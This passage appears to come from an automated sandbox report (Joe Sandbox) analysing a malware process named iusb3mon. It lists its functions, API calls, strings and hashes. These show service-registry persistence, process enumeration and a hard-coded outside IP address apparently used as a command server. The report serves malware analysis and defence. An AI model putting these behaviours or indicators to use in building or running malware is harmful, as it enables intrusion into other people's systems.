                                                                                                                    • Opcode Fuzzy Hash: 58d6bb7ec948bfff9573efbea055f14ef185cf9d00fbbb306ccccbff6c4328ff
                                                                                                                    • Instruction Fuzzy Hash: F5313EB291031DABDB60ABE0EC8DEEB777DEB44215F040592F645E2044EA74EB84CF61
                                                                                                                    Function 06245643 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 81stringtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • wsprintfA.USER32 ref: 06245660
                                                                                                                    • strlen.MSVCRT ref: 06245685
                                                                                                                      • Part of subcall function 06249423: LoadLibraryA.KERNEL32(ADVAPI32.dll,Console,80000001,0626CB7A,?,00000000,0624ADE0,0625E538,000000FF,?,062456BE,80000001,Console,Groupfenzhu,00000001,0626CB7A), ref: 06249450
                                                                                                                      • Part of subcall function 06249423: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 06249467
                                                                                                                      • Part of subcall function 06249423: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 06249472
                                                                                                                      • Part of subcall function 06249423: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 0624947D
                                                                                                                      • Part of subcall function 06249423: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 06249488
                                                                                                                      • Part of subcall function 06249423: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 06249493
                                                                                                                      • Part of subcall function 06249423: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 0624949E
                                                                                                                      • Part of subcall function 06249423: FreeLibrary.KERNEL32(00000000,?,00000000,0624ADE0,0625E538,000000FF,?,062456BE,80000001,Console,Groupfenzhu,00000001), ref: 06249592
                                                                                                                    • strlen.MSVCRT ref: 062456A7
                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 062456C5
                                                                                                                    • wsprintfA.USER32 ref: 062456ED
                                                                                                                    • strlen.MSVCRT ref: 062456FC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$strlen$Librarywsprintf$FreeLoadLocalTime
                                                                                                                    • String ID: %4d-%.2d-%.2d %.2d:%.2d$202.79.169.178$Console$Groupfenzhu$InstallTime$Remarkbeizhu$SYSTEM\CurrentControlSet\Services\%s
                                                                                                                    • API String ID: 124699875-3629434285
                                                                                                                    • Opcode ID: 2372ee7797c4be00d76d6e58803f36222b9f9190cee52eadbd64f2ce198061d8
                                                                                                                    • Instruction ID: 933589630baf0d4c8ba97ea099e876050d84436e625e2140a8ee96cbc5261ac5
                                                                                                                    • Opcode Fuzzy Hash: 2372ee7797c4be00d76d6e58803f36222b9f9190cee52eadbd64f2ce198061d8
                                                                                                                    • Instruction Fuzzy Hash: 902175B2A603147BDB90B7A6EC8AEFB767DEB08B01F040455FE42E5081E6B5D9808771
                                                                                                                    Function 062412D2 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 55networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 062412D7
                                                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 06241328
                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 06241333
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateEventH_prologStartup
                                                                                                                    • String ID: $8$g$h$k$m$q$x$y
                                                                                                                    • API String ID: 2400729181-2346024814
                                                                                                                    • Opcode ID: 565927597594e4a4434e3b9eb035082a95dae688d4036c3af538758460074582
                                                                                                                    • Instruction ID: ca6cf319235c9a713f172ff8ad6683ef29c44d6f16923d1d80bf97247f6d2f60
                                                                                                                    • Opcode Fuzzy Hash: 565927597594e4a4434e3b9eb035082a95dae688d4036c3af538758460074582
                                                                                                                    • Instruction Fuzzy Hash: 2421C6309043C5CEE761EBA8D9497EFBFF89F11348F04445DD992A2282DBB55648CBB2
                                                                                                                    Function 062490D0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 60libraryloaderstringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,?,?), ref: 062490E1
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 062490F5
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 062490FF
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0624910A
                                                                                                                    • lstrcmpiA.KERNEL32(?,?), ref: 06249142
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?), ref: 06249161
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0624916C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$Library$CloseFreeHandleLoadlstrcmpi
                                                                                                                    • String ID: CreateToolhelp32Snapshot$Process32First$Process32Next$kernel32.dll
                                                                                                                    • API String ID: 1314729832-4285911020
                                                                                                                    • Opcode ID: 955261b59553fda468d778bf87d8ffd0a5981d6541f98ccf0d740f09d98ce6e1
                                                                                                                    • Instruction ID: 49f323100add14bcadfa971cea4769ee8da7fb0b155f8d24295be3aff12043c1
                                                                                                                    • Opcode Fuzzy Hash: 955261b59553fda468d778bf87d8ffd0a5981d6541f98ccf0d740f09d98ce6e1
                                                                                                                    • Instruction Fuzzy Hash: 28114C75E11319BBEB21AB619C4DBEFBBBCAF45B10F014095BA44E2140DBB49B81CE61
                                                                                                                    Function 06243FC8 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 178stringprocessCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • wsprintfA.USER32 ref: 062440AA
                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 0624410F
                                                                                                                    • lstrcatA.KERNEL32(?,Function_00027D6C), ref: 06244155
                                                                                                                    • lstrcatA.KERNEL32(?,062442C0), ref: 06244161
                                                                                                                    • lstrcpyA.KERNEL32(00000000,062442C0), ref: 06244169
                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 062441AF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcat$CreateEnvironmentExpandProcessStringslstrcpywsprintf
                                                                                                                    • String ID: "%1$%s\shell\open\command$D$WinSta0\Default
                                                                                                                    • API String ID: 2973130283-33419044
                                                                                                                    • Opcode ID: 3b1c411c689f285480cbe3fb1afc3641ee868e7bf258dfa60db7c6053d497936
                                                                                                                    • Instruction ID: 7c5d0fba576d9008dc74df320e56556083784b54aaeb192dc848e2826d0c94e1
                                                                                                                    • Opcode Fuzzy Hash: 3b1c411c689f285480cbe3fb1afc3641ee868e7bf258dfa60db7c6053d497936
                                                                                                                    • Instruction Fuzzy Hash: 705176B2D1061DBEEF54AAE0DC88FEB77BCEB54305F1004A6FA05E6140DA719B948F60
                                                                                                                    Function 04D11891 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 55COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_4d10000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID: $8$g$h$k$m$q$x$y
                                                                                                                    • API String ID: 3519838083-2346024814
                                                                                                                    • Opcode ID: 62c5fbcb160e6cc2404c204164438830c7ace46b45df545fd289de1eca745842
                                                                                                                    • Instruction ID: 1aa304120035f5f24fba3440665f05dfd13538a6a7c5f46cd60415924da244f7
                                                                                                                    • Opcode Fuzzy Hash: 62c5fbcb160e6cc2404c204164438830c7ace46b45df545fd289de1eca745842
                                                                                                                    • Instruction Fuzzy Hash: 1A21C2309083849EF711DBA8C8497EFBFF99F15308F00055EE58263282D7B56608C772
                                                                                                                    Function 062474E9 Relevance: 16.5, APIs: 2, Strings: 9, Instructions: 37stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0624739A: wsprintfA.USER32 ref: 06247480
                                                                                                                    • lstrlenA.KERNEL32(00000080,?,?,00000000,?), ref: 06247532
                                                                                                                    • lstrlenA.KERNEL32(00000080,?,?,00000000,?), ref: 0624754A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrlen$wsprintf
                                                                                                                    • String ID: M$MarkTime$T$a$e$i$k$m$r
                                                                                                                    • API String ID: 1220175532-2269700615
                                                                                                                    • Opcode ID: 716dd77bf86e70bbf9b287f6c7aec629c46b7d6280b82da4458aa445d19d21b6
                                                                                                                    • Instruction ID: 12e1013758ec4744a03afd5d08939fea5f0d0045cdfd48ba82d4bbb61134ba99
                                                                                                                    • Opcode Fuzzy Hash: 716dd77bf86e70bbf9b287f6c7aec629c46b7d6280b82da4458aa445d19d21b6
                                                                                                                    • Instruction Fuzzy Hash: DA01A2109082C8F9DB02A7A59C48B9EBF7A9B52608F0480D9ED506A282D3BA5219C772
                                                                                                                    Function 062454A3 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 118sleepstringsynchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 062454A8
                                                                                                                      • Part of subcall function 062412D2: __EH_prolog.LIBCMT ref: 062412D7
                                                                                                                      • Part of subcall function 062412D2: WSAStartup.WS2_32(00000202,?), ref: 06241328
                                                                                                                      • Part of subcall function 062412D2: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 06241333
                                                                                                                    • lstrcatA.KERNEL32(?,0626CA18), ref: 062454F7
                                                                                                                    • _rand.LIBCMT ref: 06245503
                                                                                                                    • Sleep.KERNEL32(00000BB8,?,00000000), ref: 0624550D
                                                                                                                    • GetTickCount.KERNEL32 ref: 0624553D
                                                                                                                    • GetTickCount.KERNEL32 ref: 06245559
                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064), ref: 062455DF
                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 062455EC
                                                                                                                      • Part of subcall function 0624180D: setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 06241832
                                                                                                                      • Part of subcall function 0624180D: CancelIo.KERNEL32(?,?,?,?,0624560D), ref: 0624183B
                                                                                                                      • Part of subcall function 0624180D: InterlockedExchange.KERNEL32(?,00000000), ref: 06241847
                                                                                                                      • Part of subcall function 0624180D: closesocket.WS2_32(?), ref: 06241850
                                                                                                                      • Part of subcall function 0624180D: SetEvent.KERNEL32(?,?,?,?,0624560D), ref: 06241859
                                                                                                                      • Part of subcall function 06241AD3: __EH_prolog.LIBCMT ref: 06241AD8
                                                                                                                      • Part of subcall function 06241AD3: TerminateThread.KERNEL32(?,000000FF,00000000,00000000,00000000,?,06245626), ref: 06241B00
                                                                                                                      • Part of subcall function 06241AD3: CloseHandle.KERNEL32(?,?,06245626), ref: 06241B08
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$CountEventSleepTick$CancelCloseCreateExchangeHandleInterlockedObjectSingleStartupTerminateThreadWait_randclosesocketlstrcatsetsockopt
                                                                                                                    • String ID: 202.79.169.178
                                                                                                                    • API String ID: 2260043707-4186200246
                                                                                                                    • Opcode ID: 559a2381fb105bcff56e4461f685253cfca9006a3c5c532a317cdc68246de651
                                                                                                                    • Instruction ID: 04a18ddc8ddfa1177b2347f475cc40404fac065330a6de5ba0d5e577bc1f66a1
                                                                                                                    • Opcode Fuzzy Hash: 559a2381fb105bcff56e4461f685253cfca9006a3c5c532a317cdc68246de651
                                                                                                                    • Instruction Fuzzy Hash: 7D41C432D24359ABEB98FBA4EC48BEEBB79AF00354F004195DE55A7080EF705A85CF51
                                                                                                                    Function 06243568 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 114stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindWindowA.USER32(CTXOPConntion_Class,00000000), ref: 062435CF
                                                                                                                    • GetClassNameA.USER32(?,00000000,00000104), ref: 06243602
                                                                                                                    • GetWindowTextA.USER32(?,?,00000104), ref: 0624362B
                                                                                                                    • lstrlenA.KERNEL32(?), ref: 06243662
                                                                                                                    • GetWindow.USER32(?,00000002), ref: 06243691
                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0624369F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$lstrlen$ClassFindNameText
                                                                                                                    • String ID: -/-$CTXOPConntion_Class$_
                                                                                                                    • API String ID: 4118851945-591102176
                                                                                                                    • Opcode ID: 2ee6385bf63050a31faa7835c297480282d95fc6ffe8e521d9db6c68cc9804d4
                                                                                                                    • Instruction ID: 558c958a2a25c1de15a06a077ed1f2737878c5a0adb03d7ffb8b325cf7a51022
                                                                                                                    • Opcode Fuzzy Hash: 2ee6385bf63050a31faa7835c297480282d95fc6ffe8e521d9db6c68cc9804d4
                                                                                                                    • Instruction Fuzzy Hash: A131B77291421ABEEF99EBA5EC09BDE7BB9EB04300F1044F5EA04A5080DB719F849F54
                                                                                                                    Function 06259390 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 06259395
                                                                                                                    • GetPropA.USER32(?,AfxOldWndProc423), ref: 062593AD
                                                                                                                    • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 0625940B
                                                                                                                      • Part of subcall function 06258F78: GetWindowRect.USER32(?,?), ref: 06258F9D
                                                                                                                      • Part of subcall function 06258F78: GetWindow.USER32(?,00000004), ref: 06258FBA
                                                                                                                    • SetWindowLongA.USER32(?,000000FC,?), ref: 0625943B
                                                                                                                    • RemovePropA.USER32(?,AfxOldWndProc423), ref: 06259443
                                                                                                                    • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 0625944A
                                                                                                                    • GlobalDeleteAtom.KERNEL32(00000000), ref: 06259451
                                                                                                                      • Part of subcall function 06258F55: GetWindowRect.USER32(?,?), ref: 06258F61
                                                                                                                    • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 062594A5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
                                                                                                                    • String ID: AfxOldWndProc423
                                                                                                                    • API String ID: 2397448395-1060338832
                                                                                                                    • Opcode ID: 480721cb2e0b62552992b2c726a9abb0f6431c59bb4da5ac3129b21d33284587
                                                                                                                    • Instruction ID: 611046d9f82f1e945f3acf584e3e91bc262825b876822b28c0ac0cfa934fffe9
                                                                                                                    • Opcode Fuzzy Hash: 480721cb2e0b62552992b2c726a9abb0f6431c59bb4da5ac3129b21d33284587
                                                                                                                    • Instruction Fuzzy Hash: EC315C32C1025AFFDBA1AFA4ED49EFF7B79EF09610F014519FE21A1150C7758A908BA1
                                                                                                                    Function 0625C5BA Relevance: 15.1, APIs: 10, Instructions: 99memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(0000001C,06276588,00000100,?,00000000,00000000,0625C863,?,00000100,0625C48E,0625C4D2,062587DA,00000100,06258773,?,?), ref: 0625C5C9
                                                                                                                    • GlobalAlloc.KERNEL32(00002002,?,?,?,00000000,00000000,0625C863,?,00000100,0625C48E,0625C4D2,062587DA,00000100,06258773,?,?), ref: 0625C61E
                                                                                                                    • GlobalHandle.KERNEL32(?), ref: 0625C627
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0625C630
                                                                                                                    • GlobalReAlloc.KERNEL32(00000000,?,00002002), ref: 0625C642
                                                                                                                    • GlobalHandle.KERNEL32(?), ref: 0625C659
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0625C660
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,0625C863,?,00000100,0625C48E,0625C4D2,062587DA,00000100,06258773,?,?,00000100), ref: 0625C666
                                                                                                                    • GlobalLock.KERNEL32(?), ref: 0625C675
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0625C6BE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2667261700-0
                                                                                                                    • Opcode ID: c490d45bd9ae1163764a790f4b2ea429df1176ce429100703bf0b565e77718e4
                                                                                                                    • Instruction ID: adc3537cf45bc0d63b6162c21f5b5ce72aee765c478b3081fe3fb23f2c23abd6
                                                                                                                    • Opcode Fuzzy Hash: c490d45bd9ae1163764a790f4b2ea429df1176ce429100703bf0b565e77718e4
                                                                                                                    • Instruction Fuzzy Hash: 1D3170B57107069FD7349F28EC89A2AB7E9FB85201B02492DEDA6D3650E771EE04CF10
                                                                                                                    Function 04D1DC56 Relevance: 14.5, APIs: 2, Strings: 6, Instructions: 469COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_4d10000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __aulldiv__aullrem
                                                                                                                    • String ID: $'$9$@$g$g
                                                                                                                    • API String ID: 3839614884-2311196974
                                                                                                                    • Opcode ID: 623da7cb9067cec10be50fd8bcdce45f781f768c5608f194e8465b0d7b52ac49
                                                                                                                    • Instruction ID: b35ff1e61b1dbc828aee4d7ad9c82606b34a5d5a78e9c7011b34a0a347729646
                                                                                                                    • Opcode Fuzzy Hash: 623da7cb9067cec10be50fd8bcdce45f781f768c5608f194e8465b0d7b52ac49
                                                                                                                    • Instruction Fuzzy Hash: 06028E71E05249FAEF14CF98E9487EDBBB6FF04314F14805AEC50A62A1E774BA41CB61
                                                                                                                    Function 001D8D60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 132COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 001D8D97
                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 001D8D9F
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 001D8E28
                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 001D8E53
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 001D8EA8
                                                                                                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 001D8EBE
                                                                                                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 001D8ED3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmpDownload File
